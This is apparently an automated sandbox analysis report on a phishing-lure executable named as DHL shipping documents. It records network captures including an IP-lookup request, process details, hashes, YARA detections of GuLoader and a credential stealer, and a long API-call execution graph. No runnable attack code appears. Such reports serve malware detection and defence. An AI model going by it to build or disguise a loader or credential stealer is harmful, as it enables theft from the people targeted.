                                          Data Ascii: 7f%,y#9"ZHxq (-%hhtSQ2ntj^gaji>R?SUE57<T9&-xye+(|U-Adw T`E,Qun|)sNT*LC~S^lI,R/pwh0t-1#U6]Xp+n<d{|y<E
                                          Jul 1, 2024 12:26:05.043715954 CEST1289INData Raw: 4d 8f 26 ed b2 a4 8c 53 c2 4f 1d 50 7b ba 5d 8e 2c 44 6e 23 ff 7a af f5 5a b2 2a d3 c7 a3 6b f0 79 de 48 b3 71 9d fe b1 70 6b f7 d9 03 cc 40 64 eb ae ad 9a b8 65 a1 00 f5 fb 0b 87 f3 d1 52 c9 b9 ea ec 2d 20 db be d9 12 49 3c 20 76 20 47 ff 07 53
                                          Data Ascii: M&SOP{],Dn#zZ*kyHqpk@deR- I< v GS+Vgr%IDSL<ou:N(K,FH#,T{I9"ZyH$-e%z5\R =mk<[@a^h&pd'K50=W"9U/'xl+6PV


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.11.2049739104.26.12.20544310220C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe
                                          TimestampBytes transferredDirectionData
                                          2024-07-01 10:26:10 UTC155OUTGET / HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                          Host: api.ipify.org
                                          Connection: Keep-Alive
                                          2024-07-01 10:26:10 UTC211INHTTP/1.1 200 OK
                                          Date: Mon, 01 Jul 2024 10:26:10 GMT
                                          Content-Type: text/plain
                                          Content-Length: 12
                                          Connection: close
                                          Vary: Origin
                                          CF-Cache-Status: DYNAMIC
                                          Server: cloudflare
                                          CF-RAY: 89c5b23ebfdf2988-ORD
                                          2024-07-01 10:26:10 UTC12INData Raw: 38 31 2e 31 38 31 2e 36 32 2e 39 39
                                          Data Ascii: 81.181.62.99


                                          Click to jump to process

                                          Click to jump to process

                                          Click to dive into process behavior distribution

                                          Click to jump to process

                                          Target ID:0
                                          Start time:06:25:45
                                          Start date:01/07/2024
                                          Path:C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe"
                                          Imagebase:0x400000
                                          File size:510'664 bytes
                                          MD5 hash:6A8D426B602C62FF313A431B6F026B6B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1438112773.00000000083AE000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          Target ID:9
                                          Start time:06:25:56
                                          Start date:01/07/2024
                                          Path:C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe"
                                          Imagebase:0x400000
                                          File size:510'664 bytes
                                          MD5 hash:6A8D426B602C62FF313A431B6F026B6B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.6345828511.0000000036BD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000002.6321510839.000000000542E000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:false

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:20.1%
                                            Dynamic/Decrypted Code Coverage:16.9%
                                            Signature Coverage:15.8%
                                            Total number of Nodes:1600
                                            Total number of Limit Nodes:39
                                            execution_graph 4315 4015c2 4319 402c5e 4315->4319 4318 4015db 4320 402c6a 4319->4320 4325 406320 4320->4325 4323 4015c9 SetFileAttributesA 4323->4318 4340 40632d 4325->4340 4326 40656e 4327 402c8b 4326->4327 4364 40628d lstrcpynA 4326->4364 4327->4323 4342 406587 4327->4342 4329 406545 lstrlenA 4329->4340 4332 406320 15 API calls 4332->4329 4334 40644c GetSystemDirectoryA 4334->4340 4335 406462 GetWindowsDirectoryA 4335->4340 4336 406587 5 API calls 4336->4340 4337 406320 15 API calls 4337->4340 4338 4064ee lstrcatA 4338->4340 4340->4326 4340->4329 4340->4332 4340->4334 4340->4335 4340->4336 4340->4337 4340->4338 4341 4064c5 SHGetPathFromIDListA CoTaskMemFree 4340->4341 4351 406174 4340->4351 4356 4066b5 GetModuleHandleA 4340->4356 4362 4061eb wsprintfA 4340->4362 4363 40628d lstrcpynA 4340->4363 4341->4340 4343 406593 4342->4343 4345 4065f0 CharNextA 4343->4345 4347 4065fb 4343->4347 4349 4065de CharNextA 4343->4349 4350 4065eb CharNextA 4343->4350 4372 405c4a 4343->4372 4344 4065ff CharPrevA 4344->4347 4345->4343 4345->4347 4347->4344 4348 40661a 4347->4348 4348->4323 4349->4343 4350->4345 4365 406113 4351->4365 4354 4061d7 4354->4340 4355 4061a8 RegQueryValueExA RegCloseKey 4355->4354 4357 4066d1 4356->4357 4358 4066db GetProcAddress 4356->4358 4369 406647 GetSystemDirectoryA 4357->4369 4360 4066ea 4358->4360 4360->4340 4361 4066d7 4361->4358 4361->4360 4362->4340 4363->4340 4364->4327 4366 406122 4365->4366 4367 406126 4366->4367 4368 40612b RegOpenKeyExA 4366->4368 4367->4354 4367->4355 4368->4367 4370 406669 wsprintfA LoadLibraryExA 4369->4370 4370->4361 4373 405c50 4372->4373 4374 405c63 4373->4374 4375 405c56 CharNextA 4373->4375 4374->4343 4375->4373 4376 402543 4387 402c9e 4376->4387 4379 402c5e 21 API calls 4380 402556 4379->4380 4381 402560 RegQueryValueExA 4380->4381 4386 4027ed 4380->4386 4382 402580 4381->4382 4383 402586 RegCloseKey 4381->4383 4382->4383 4392 4061eb wsprintfA 4382->4392 4383->4386 4388 402c5e 21 API calls 4387->4388 4389 402cb5 4388->4389 4390 406113 RegOpenKeyExA 4389->4390 4391 40254d 4390->4391 4391->4379 4392->4383 5427 401a43 5428 402c5e 21 API calls 5427->5428 5429 401a4c ExpandEnvironmentStringsA 5428->5429 5430 401a60 5429->5430 5432 401a73 5429->5432 5431 401a65 lstrcmpA 5430->5431 5430->5432 5431->5432 5438 401744 5439 402c5e 21 API calls 5438->5439 5440 40174b SearchPathA 5439->5440 5441 401766 5440->5441 5442 401d44 5443 402c3c 21 API calls 5442->5443 5444 401d4b 5443->5444 5445 402c3c 21 API calls 5444->5445 5446 401d57 GetDlgItem 5445->5446 5447 40264d 5446->5447 5448 402ac5 SendMessageA 5449 402aea 5448->5449 5450 402adf InvalidateRect 5448->5450 5450->5449 5451 405345 5452 405355 5451->5452 5453 405369 5451->5453 5454 40535b 5452->5454 5463 4053b2 5452->5463 5455 405371 IsWindowVisible 5453->5455 5461 405388 5453->5461 5457 404379 SendMessageA 5454->5457 5458 40537e 5455->5458 5455->5463 5456 4053b7 CallWindowProcA 5459 405365 5456->5459 5457->5459 5464 404c80 SendMessageA 5458->5464 5461->5456 5469 404d00 5461->5469 5463->5456 5465 404ca3 GetMessagePos ScreenToClient SendMessageA 5464->5465 5466 404cdf SendMessageA 5464->5466 5467 404cd7 5465->5467 5468 404cdc 5465->5468 5466->5467 5467->5461 5468->5466 5478 40628d lstrcpynA 5469->5478 5471 404d13 5479 4061eb wsprintfA 5471->5479 5473 404d1d 5474 40140b 2 API calls 5473->5474 5475 404d26 5474->5475 5480 40628d lstrcpynA 5475->5480 5477 404d2d 5477->5463 5478->5471 5479->5473 5480->5477 4393 4023c9 4394 4023d1 4393->4394 4395 4023d7 4393->4395 4396 402c5e 21 API calls 4394->4396 4397 4023e7 4395->4397 4398 402c5e 21 API calls 4395->4398 4396->4395 4399 4023f5 4397->4399 4401 402c5e 21 API calls 4397->4401 4398->4397 4400 402c5e 21 API calls 4399->4400 4402 4023fe WritePrivateProfileStringA 4400->4402 4401->4399 5481 6f7a2c73 5482 6f7a2c8b 5481->5482 5485 6f7a15c4 GlobalSize GlobalAlloc 5482->5485 5484 6f7a2ca6 5486 6f7a15e2 5485->5486 5486->5484 4403 4020ca 4404 4020dc 4403->4404 4414 40218a 4403->4414 4405 402c5e 21 API calls 4404->4405 4407 4020e3 4405->4407 4406 401423 28 API calls 4412 40230f 4406->4412 4408 402c5e 21 API calls 4407->4408 4409 4020ec 4408->4409 4410 402101 LoadLibraryExA 4409->4410 4411 4020f4 GetModuleHandleA 4409->4411 4413 402111 GetProcAddress 4410->4413 4410->4414 4411->4410 4411->4413 4415 402120 4413->4415 4416 40215d 4413->4416 4414->4406 4418 402128 4415->4418 4419 40213f 4415->4419 4469 4053d1 4416->4469 4466 401423 4418->4466 4424 6f7a176b 4419->4424 4420 402130 4420->4412 4422 40217e FreeLibrary 4420->4422 4422->4412 4425 6f7a179b 4424->4425 4480 6f7a1b28 4425->4480 4427 6f7a17a2 4428 6f7a18c4 4427->4428 4429 6f7a17ba 4427->4429 4430 6f7a17b3 4427->4430 4428->4420 4512 6f7a2381 4429->4512 4528 6f7a233f 4430->4528 4435 6f7a181e 4441 6f7a186c 4435->4441 4442 6f7a1824 4435->4442 4436 6f7a1800 4541 6f7a2568 4436->4541 4437 6f7a17e9 4452 6f7a17df 4437->4452 4538 6f7a2d53 4437->4538 4438 6f7a17d0 4440 6f7a17d6 4438->4440 4447 6f7a17e1 4438->4447 4440->4452 4522 6f7a2ac8 4440->4522 4445 6f7a2568 11 API calls 4441->4445 4560 6f7a15fb 4442->4560 4450 6f7a185d 4445->4450 4446 6f7a1806 4552 6f7a15e9 4446->4552 4532 6f7a2742 4447->4532 4457 6f7a18b3 4450->4457 4566 6f7a252e 4450->4566 4452->4435 4452->4436 4454 6f7a17e7 4454->4452 4455 6f7a2568 11 API calls 4455->4450 4457->4428 4459 6f7a18bd GlobalFree 4457->4459 4459->4428 4463 6f7a189f 4463->4457 4570 6f7a1572 wsprintfA 4463->4570 4465 6f7a1898 FreeLibrary 4465->4463 4467 4053d1 28 API calls 4466->4467 4468 401431 4467->4468 4468->4420 4470 4053ec 4469->4470 4479 40548f 4469->4479 4471 405409 lstrlenA 4470->4471 4472 406320 21 API calls 4470->4472 4473 405432 4471->4473 4474 405417 lstrlenA 4471->4474 4472->4471 4476 405445 4473->4476 4477 405438 SetWindowTextA 4473->4477 4475 405429 lstrcatA 4474->4475 4474->4479 4475->4473 4478 40544b SendMessageA SendMessageA SendMessageA 4476->4478 4476->4479 4477->4476 4478->4479 4479->4420 4573 6f7a12a5 GlobalAlloc 4480->4573 4482 6f7a1b4f 4574 6f7a12a5 GlobalAlloc 4482->4574 4484 6f7a1d90 GlobalFree GlobalFree GlobalFree 4485 6f7a1dad 4484->4485 4496 6f7a1df7 4484->4496 4487 6f7a2181 4485->4487 4495 6f7a1dc2 4485->4495 4485->4496 4486 6f7a1c4d GlobalAlloc 4507 6f7a1b5a 4486->4507 4488 6f7a21a3 GetModuleHandleA 4487->4488 4487->4496 4489 6f7a21c9 4488->4489 4490 6f7a21b4 LoadLibraryA 4488->4490 4579 6f7a1652 GetProcAddress 4489->4579 4490->4489 4490->4496 4491 6f7a1c98 lstrcpyA 4494 6f7a1ca2 lstrcpyA 4491->4494 4492 6f7a1cb6 GlobalFree 4492->4507 4494->4507 4495->4496 4575 6f7a12b4 4495->4575 4496->4427 4497 6f7a221a 4497->4496 4501 6f7a2227 lstrlenA 4497->4501 4498 6f7a2047 4578 6f7a12a5 GlobalAlloc 4498->4578 4580 6f7a1652 GetProcAddress 4501->4580 4502 6f7a1f89 GlobalFree 4502->4507 4503 6f7a20c3 4503->4496 4509 6f7a211c lstrcpyA 4503->4509 4504 6f7a21db 4504->4497 4510 6f7a2204 GetProcAddress 4504->4510 4506 6f7a2240 4506->4496 4507->4484 4507->4486 4507->4491 4507->4492 4507->4494 4507->4496 4507->4498 4507->4502 4507->4503 4508 6f7a12b4 2 API calls 4507->4508 4508->4507 4509->4496 4510->4497 4511 6f7a204f 4511->4427 4514 6f7a239a 4512->4514 4513 6f7a12b4 GlobalAlloc lstrcpynA 4513->4514 4514->4513 4516 6f7a24d6 GlobalFree 4514->4516 4517 6f7a2448 GlobalAlloc MultiByteToWideChar 4514->4517 4520 6f7a2495 4514->4520 4582 6f7a133d 4514->4582 4516->4514 4518 6f7a17c0 4516->4518 4519 6f7a2474 GlobalAlloc CLSIDFromString GlobalFree 4517->4519 4517->4520 4518->4437 4518->4438 4518->4452 4519->4516 4520->4516 4586 6f7a26d6 4520->4586 4524 6f7a2ada 4522->4524 4523 6f7a2b7f EnumWindows 4527 6f7a2b9d 4523->4527 4524->4523 4526 6f7a2c69 4526->4452 4589 6f7a2a74 4527->4589 4529 6f7a2354 4528->4529 4530 6f7a235f GlobalAlloc 4529->4530 4531 6f7a17b9 4529->4531 4530->4529 4531->4429 4536 6f7a2772 4532->4536 4533 6f7a280d GlobalAlloc 4537 6f7a2830 4533->4537 4534 6f7a2820 4535 6f7a2826 GlobalSize 4534->4535 4534->4537 4535->4537 4536->4533 4536->4534 4537->4454 4539 6f7a2d5e 4538->4539 4540 6f7a2d9e GlobalFree 4539->4540 4593 6f7a12a5 GlobalAlloc 4541->4593 4543 6f7a2628 WideCharToMultiByte 4546 6f7a2574 4543->4546 4544 6f7a25f3 lstrcpynA 4544->4546 4545 6f7a2604 StringFromGUID2 WideCharToMultiByte 4545->4546 4546->4543 4546->4544 4546->4545 4547 6f7a2649 wsprintfA 4546->4547 4548 6f7a266d GlobalFree 4546->4548 4549 6f7a26a7 GlobalFree 4546->4549 4550 6f7a12f6 2 API calls 4546->4550 4594 6f7a1361 4546->4594 4547->4546 4548->4546 4549->4446 4550->4546 4598 6f7a12a5 GlobalAlloc 4552->4598 4554 6f7a15ee 4555 6f7a15fb 2 API calls 4554->4555 4556 6f7a15f8 4555->4556 4557 6f7a12f6 4556->4557 4558 6f7a1338 GlobalFree 4557->4558 4559 6f7a12ff GlobalAlloc lstrcpynA 4557->4559 4558->4450 4559->4558 4561 6f7a1607 wsprintfA 4560->4561 4562 6f7a1634 lstrcpyA 4560->4562 4565 6f7a164d 4561->4565 4562->4565 4565->4455 4567 6f7a253c 4566->4567 4569 6f7a187f 4566->4569 4568 6f7a2555 GlobalFree 4567->4568 4567->4569 4568->4567 4569->4463 4569->4465 4571 6f7a12f6 2 API calls 4570->4571 4572 6f7a1593 4571->4572 4572->4457 4573->4482 4574->4507 4581 6f7a12a5 GlobalAlloc 4575->4581 4577 6f7a12c3 lstrcpynA 4577->4496 4578->4511 4579->4504 4580->4506 4581->4577 4583 6f7a1344 4582->4583 4584 6f7a12b4 2 API calls 4583->4584 4585 6f7a135f 4584->4585 4585->4514 4587 6f7a273a 4586->4587 4588 6f7a26e4 VirtualAlloc 4586->4588 4587->4520 4588->4587 4590 6f7a2a7f 4589->4590 4591 6f7a2a8f 4590->4591 4592 6f7a2a84 GetLastError 4590->4592 4591->4526 4592->4591 4593->4546 4595 6f7a136a 4594->4595 4596 6f7a1389 4594->4596 4595->4596 4597 6f7a1370 lstrcpyA 4595->4597 4596->4546 4597->4596 4598->4554 5487 402e4a 5488 402e72 5487->5488 5489 402e59 SetTimer 5487->5489 5490 402ec7 5488->5490 5491 402e8c MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5488->5491 5489->5488 5491->5490 4609 40244e 4610 402480 4609->4610 4611 402455 4609->4611 4613 402c5e 21 API calls 4610->4613 4612 402c9e 21 API calls 4611->4612 4614 40245c 4612->4614 4615 402487 4613->4615 4616 402466 4614->4616 4620 402494 4614->4620 4621 402d1c 4615->4621 4618 402c5e 21 API calls 4616->4618 4619 40246d RegDeleteValueA RegCloseKey 4618->4619 4619->4620 4622 402d28 4621->4622 4623 402d2f 4621->4623 4622->4620 4623->4622 4625 402d60 4623->4625 4626 406113 RegOpenKeyExA 4625->4626 4627 402d8e 4626->4627 4628 402e43 4627->4628 4629 402d98 4627->4629 4628->4622 4630 402dc1 4629->4630 4631 402d9e RegEnumValueA 4629->4631 4632 402e28 RegCloseKey 4630->4632 4633 402dfd RegEnumKeyA 4630->4633 4634 402e06 RegCloseKey 4630->4634 4636 402d60 6 API calls 4630->4636 4631->4630 4631->4632 4632->4628 4633->4630 4633->4634 4635 4066b5 5 API calls 4634->4635 4637 402e16 4635->4637 4636->4630 4638 402e38 4637->4638 4639 402e1a RegDeleteKeyA 4637->4639 4638->4628 4639->4628 5495 6f7a1cf4 5496 6f7a15c4 2 API calls 5495->5496 5520 6f7a1b6c 5496->5520 5497 6f7a1d90 GlobalFree GlobalFree GlobalFree 5498 6f7a1dad 5497->5498 5514 6f7a1df7 5497->5514 5499 6f7a2181 5498->5499 5505 6f7a1dc2 5498->5505 5498->5514 5500 6f7a21a3 GetModuleHandleA 5499->5500 5499->5514 5501 6f7a21c9 5500->5501 5502 6f7a21b4 LoadLibraryA 5500->5502 5525 6f7a1652 GetProcAddress 5501->5525 5502->5501 5502->5514 5504 6f7a1c4d GlobalAlloc 5504->5520 5509 6f7a12b4 2 API calls 5505->5509 5505->5514 5506 6f7a221a 5510 6f7a2227 lstrlenA 5506->5510 5506->5514 5507 6f7a1c98 lstrcpyA 5511 6f7a1ca2 lstrcpyA 5507->5511 5508 6f7a1cb6 GlobalFree 5508->5520 5509->5514 5526 6f7a1652 GetProcAddress 5510->5526 5511->5520 5512 6f7a21db 5512->5506 5519 6f7a2204 GetProcAddress 5512->5519 5515 6f7a2047 5524 6f7a12a5 GlobalAlloc 5515->5524 5517 6f7a1f89 GlobalFree 5517->5520 5518 6f7a20c3 5518->5514 5522 6f7a211c lstrcpyA 5518->5522 5519->5506 5520->5497 5520->5504 5520->5507 5520->5508 5520->5511 5520->5514 5520->5515 5520->5517 5520->5518 5521 6f7a12b4 2 API calls 5520->5521 5521->5520 5522->5514 5523 6f7a204f 5524->5523 5525->5512 5526->5514 5527 4027cf 5528 402c5e 21 API calls 5527->5528 5529 4027d6 FindFirstFileA 5528->5529 5530 4027f9 5529->5530 5534 4027e9 5529->5534 5535 4061eb wsprintfA 5530->5535 5532 402800 5536 40628d lstrcpynA 5532->5536 5535->5532 5536->5534 5537 6f7a22ea 5538 6f7a2354 5537->5538 5539 6f7a235f GlobalAlloc 5538->5539 5540 6f7a237e 5538->5540 5539->5538 5541 401c53 5542 402c3c 21 API calls 5541->5542 5543 401c5a 5542->5543 5544 402c3c 21 API calls 5543->5544 5545 401c67 5544->5545 5546 401c7c 5545->5546 5547 402c5e 21 API calls 5545->5547 5548 401c8c 5546->5548 5549 402c5e 21 API calls 5546->5549 5547->5546 5550 401ce3 5548->5550 5551 401c97 5548->5551 5549->5548 5552 402c5e 21 API calls 5550->5552 5553 402c3c 21 API calls 5551->5553 5555 401ce8 5552->5555 5554 401c9c 5553->5554 5556 402c3c 21 API calls 5554->5556 5557 402c5e 21 API calls 5555->5557 5558 401ca8 5556->5558 5559 401cf1 FindWindowExA 5557->5559 5560 401cd3 SendMessageA 5558->5560 5561 401cb5 SendMessageTimeoutA 5558->5561 5562 401d0f 5559->5562 5560->5562 5561->5562 5563 402653 5564 402658 5563->5564 5565 40266c 5563->5565 5566 402c3c 21 API calls 5564->5566 5567 402c5e 21 API calls 5565->5567 5569 402661 5566->5569 5568 402673 lstrlenA 5567->5568 5568->5569 5570 402695 5569->5570 5571 405ec7 WriteFile 5569->5571 5571->5570 5572 403a54 5573 403a5f 5572->5573 5574 403a63 5573->5574 5575 403a66 GlobalAlloc 5573->5575 5575->5574 4782 4014d6 4787 402c3c 4782->4787 4784 4014dc Sleep 4786 402aea 4784->4786 4788 406320 21 API calls 4787->4788 4789 402c51 4788->4789 4789->4784 4790 401957 4791 401959 4790->4791 4792 402c5e 21 API calls 4791->4792 4793 40195e 4792->4793 4796 405a4f 4793->4796 4836 405d0d 4796->4836 4799 405a77 DeleteFileA 4801 401967 4799->4801 4800 405a8e 4804 405bc6 4800->4804 4850 40628d lstrcpynA 4800->4850 4803 405ab4 4805 405ac7 4803->4805 4806 405aba lstrcatA 4803->4806 4804->4801 4807 406620 2 API calls 4804->4807 4851 405c66 lstrlenA 4805->4851 4808 405acd 4806->4808 4810 405be0 4807->4810 4811 405adb lstrcatA 4808->4811 4812 405ae6 lstrlenA FindFirstFileA 4808->4812 4810->4801 4813 405be4 4810->4813 4811->4812 4814 405bbc 4812->4814 4834 405b0a 4812->4834 4864 405c1f lstrlenA CharPrevA 4813->4864 4814->4804 4816 405c4a CharNextA 4816->4834 4818 405a07 5 API calls 4819 405bf6 4818->4819 4820 405c10 4819->4820 4821 405bfa 4819->4821 4822 4053d1 28 API calls 4820->4822 4821->4801 4826 4053d1 28 API calls 4821->4826 4822->4801 4823 405b9b FindNextFileA 4825 405bb3 FindClose 4823->4825 4823->4834 4825->4814 4827 405c07 4826->4827 4828 406066 40 API calls 4827->4828 4830 405c0e 4828->4830 4830->4801 4831 405a4f 64 API calls 4831->4834 4832 4053d1 28 API calls 4832->4823 4833 4053d1 28 API calls 4833->4834 4834->4816 4834->4823 4834->4831 4834->4832 4834->4833 4835 406066 40 API calls 4834->4835 4855 40628d lstrcpynA 4834->4855 4856 405a07 4834->4856 4835->4834 4867 40628d lstrcpynA 4836->4867 4838 405d1e 4868 405cb8 CharNextA CharNextA 4838->4868 4841 405a6f 4841->4799 4841->4800 4842 406587 5 API calls 4848 405d34 4842->4848 4843 405d5f lstrlenA 4844 405d6a 4843->4844 4843->4848 4846 405c1f 3 API calls 4844->4846 4845 406620 2 API calls 4845->4848 4847 405d6f GetFileAttributesA 4846->4847 4847->4841 4848->4841 4848->4843 4848->4845 4849 405c66 2 API calls 4848->4849 4849->4843 4850->4803 4852 405c73 4851->4852 4853 405c84 4852->4853 4854 405c78 CharPrevA 4852->4854 4853->4808 4854->4852 4854->4853 4855->4834 4874 405dfb GetFileAttributesA 4856->4874 4859 405a22 RemoveDirectoryA 4861 405a30 4859->4861 4860 405a2a DeleteFileA 4860->4861 4862 405a34 4861->4862 4863 405a40 SetFileAttributesA 4861->4863 4862->4834 4863->4862 4865 405bea 4864->4865 4866 405c39 lstrcatA 4864->4866 4865->4818 4866->4865 4867->4838 4869 405cd3 4868->4869 4871 405ce3 4868->4871 4869->4871 4872 405cde CharNextA 4869->4872 4870 405d03 4870->4841 4870->4842 4871->4870 4873 405c4a CharNextA 4871->4873 4872->4870 4873->4871 4875 405a13 4874->4875 4876 405e0d SetFileAttributesA 4874->4876 4875->4859 4875->4860 4875->4862 4876->4875 4877 4033d8 SetErrorMode GetVersionExA 4878 40342a GetVersionExA 4877->4878 4880 403469 4877->4880 4879 403446 4878->4879 4878->4880 4879->4880 4881 4034ed 4880->4881 4882 4066b5 5 API calls 4880->4882 4883 406647 3 API calls 4881->4883 4882->4881 4884 403503 lstrlenA 4883->4884 4884->4881 4885 403513 4884->4885 4886 4066b5 5 API calls 4885->4886 4887 40351a 4886->4887 4888 4066b5 5 API calls 4887->4888 4889 403521 4888->4889 4890 4066b5 5 API calls 4889->4890 4891 40352d #17 OleInitialize SHGetFileInfoA 4890->4891 4966 40628d lstrcpynA 4891->4966 4894 40357b GetCommandLineA 4967 40628d lstrcpynA 4894->4967 4896 40358d 4897 405c4a CharNextA 4896->4897 4898 4035b4 CharNextA 4897->4898 4906 4035c3 4898->4906 4899 403689 4900 40369d GetTempPathA 4899->4900 4968 4033a7 4900->4968 4902 4036b5 4903 4036b9 GetWindowsDirectoryA lstrcatA 4902->4903 4904 40370f DeleteFileA 4902->4904 4907 4033a7 12 API calls 4903->4907 4978 402f31 GetTickCount GetModuleFileNameA 4904->4978 4905 405c4a CharNextA 4905->4906 4906->4899 4906->4905 4910 40368b 4906->4910 4909 4036d5 4907->4909 4909->4904 4912 4036d9 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4909->4912 5062 40628d lstrcpynA 4910->5062 4911 403722 4915 4037a7 4911->4915 4919 405c4a CharNextA 4911->4919 4958 4037b7 4911->4958 4914 4033a7 12 API calls 4912->4914 4917 403707 4914->4917 5006 403a96 4915->5006 4917->4904 4917->4958 4921 40373c 4919->4921 4928 403781 4921->4928 4929 4037e6 4921->4929 4922 4037d1 5072 4059a3 4922->5072 4923 403928 4925 403930 GetCurrentProcess OpenProcessToken 4923->4925 4926 4039a6 ExitProcess 4923->4926 4931 403976 4925->4931 4932 403947 LookupPrivilegeValueA AdjustTokenPrivileges 4925->4932 4933 405d0d 18 API calls 4928->4933 5076 40590e 4929->5076 4935 4066b5 5 API calls 4931->4935 4932->4931 4937 40378d 4933->4937 4936 40397d 4935->4936 4939 403992 ExitWindowsEx 4936->4939 4941 40399f 4936->4941 4937->4958 5063 40628d lstrcpynA 4937->5063 4939->4926 4939->4941 5090 40140b 4941->5090 4943 403803 4946 40381b 4943->4946 5080 40628d lstrcpynA 4943->5080 4945 40379c 5064 40628d lstrcpynA 4945->5064 4949 403839 wsprintfA 4946->4949 4953 403867 4946->4953 4950 406320 21 API calls 4949->4950 4950->4946 4953->4946 4953->4949 4954 403877 GetFileAttributesA 4953->4954 4955 4038af SetCurrentDirectoryA 4953->4955 4953->4958 4960 405a4f 71 API calls 4953->4960 4961 406066 40 API calls 4953->4961 4962 406320 21 API calls 4953->4962 4964 403918 CloseHandle 4953->4964 4965 406620 2 API calls 4953->4965 5081 405897 CreateDirectoryA 4953->5081 5084 4058f1 CreateDirectoryA 4953->5084 5087 405926 CreateProcessA 4953->5087 4954->4953 4956 403883 DeleteFileA 4954->4956 4957 406066 40 API calls 4955->4957 4956->4953 4959 4038be CopyFileA 4957->4959 5065 4039bc 4958->5065 4959->4953 4959->4958 4960->4953 4961->4953 4962->4953 4964->4958 4965->4953 4966->4894 4967->4896 4969 406587 5 API calls 4968->4969 4970 4033b3 4969->4970 4971 4033bd 4970->4971 4972 405c1f 3 API calls 4970->4972 4971->4902 4973 4033c5 4972->4973 4974 4058f1 2 API calls 4973->4974 4975 4033cb 4974->4975 5093 405e4f 4975->5093 5097 405e20 GetFileAttributesA CreateFileA 4978->5097 4980 402f71 4999 402f81 4980->4999 5098 40628d lstrcpynA 4980->5098 4982 402f97 4983 405c66 2 API calls 4982->4983 4984 402f9d 4983->4984 5099 40628d lstrcpynA 4984->5099 4986 402fa8 GetFileSize 4987 4030a2 4986->4987 5005 402fbf 4986->5005 5100 402ecd 4987->5100 4989 4030ab 4991 4030db GlobalAlloc 4989->4991 4989->4999 5135 403390 SetFilePointer 4989->5135 5111 403390 SetFilePointer 4991->5111 4993 40310e 4995 402ecd 6 API calls 4993->4995 4995->4999 4996 4030c4 5000 40337a ReadFile 4996->5000 4997 4030f6 5112 403168 4997->5112 4999->4911 5001 4030cf 5000->5001 5001->4991 5001->4999 5002 402ecd 6 API calls 5002->5005 5003 403102 5003->4999 5003->5003 5004 40313f SetFilePointer 5003->5004 5004->4999 5005->4987 5005->4993 5005->4999 5005->5002 5132 40337a 5005->5132 5007 4066b5 5 API calls 5006->5007 5008 403aaa 5007->5008 5009 403ab0 5008->5009 5010 403ac2 5008->5010 5149 4061eb wsprintfA 5009->5149 5011 406174 3 API calls 5010->5011 5012 403aed 5011->5012 5013 403b0b lstrcatA 5012->5013 5015 406174 3 API calls 5012->5015 5016 403ac0 5013->5016 5015->5013 5141 403d5b 5016->5141 5019 405d0d 18 API calls 5020 403b3d 5019->5020 5021 403bc6 5020->5021 5023 406174 3 API calls 5020->5023 5022 405d0d 18 API calls 5021->5022 5024 403bcc 5022->5024 5025 403b69 5023->5025 5026 403bdc LoadImageA 5024->5026 5029 406320 21 API calls 5024->5029 5025->5021 5033 403b85 lstrlenA 5025->5033 5037 405c4a CharNextA 5025->5037 5027 403c82 5026->5027 5028 403c03 RegisterClassA 5026->5028 5032 40140b 2 API calls 5027->5032 5030 403c8c 5028->5030 5031 403c39 SystemParametersInfoA CreateWindowExA 5028->5031 5029->5026 5030->4958 5031->5027 5036 403c88 5032->5036 5034 403b93 lstrcmpiA 5033->5034 5035 403bb9 5033->5035 5034->5035 5039 403ba3 GetFileAttributesA 5034->5039 5040 405c1f 3 API calls 5035->5040 5036->5030 5042 403d5b 22 API calls 5036->5042 5038 403b83 5037->5038 5038->5033 5041 403baf 5039->5041 5043 403bbf 5040->5043 5041->5035 5044 405c66 2 API calls 5041->5044 5045 403c99 5042->5045 5150 40628d lstrcpynA 5043->5150 5044->5035 5047 403ca5 ShowWindow 5045->5047 5048 403d28 5045->5048 5050 406647 3 API calls 5047->5050 5049 4054a3 5 API calls 5048->5049 5051 403d2e 5049->5051 5052 403cbd 5050->5052 5053 403d4a 5051->5053 5057 403d32 5051->5057 5054 403ccb GetClassInfoA 5052->5054 5059 406647 3 API calls 5052->5059 5058 40140b 2 API calls 5053->5058 5055 403cf5 DialogBoxParamA 5054->5055 5056 403cdf GetClassInfoA RegisterClassA 5054->5056 5060 40140b 2 API calls 5055->5060 5056->5055 5057->5030 5061 40140b 2 API calls 5057->5061 5058->5030 5059->5054 5060->5030 5061->5030 5062->4900 5063->4945 5064->4915 5066 4039d4 5065->5066 5067 4039c6 CloseHandle 5065->5067 5155 403a01 5066->5155 5067->5066 5070 405a4f 71 API calls 5071 4037bf OleUninitialize 5070->5071 5071->4922 5071->4923 5073 4059b8 5072->5073 5074 4037de ExitProcess 5073->5074 5075 4059cc MessageBoxIndirectA 5073->5075 5075->5074 5077 4066b5 5 API calls 5076->5077 5078 4037eb lstrlenA 5077->5078 5079 40628d lstrcpynA 5078->5079 5079->4943 5080->4946 5082 4058e3 5081->5082 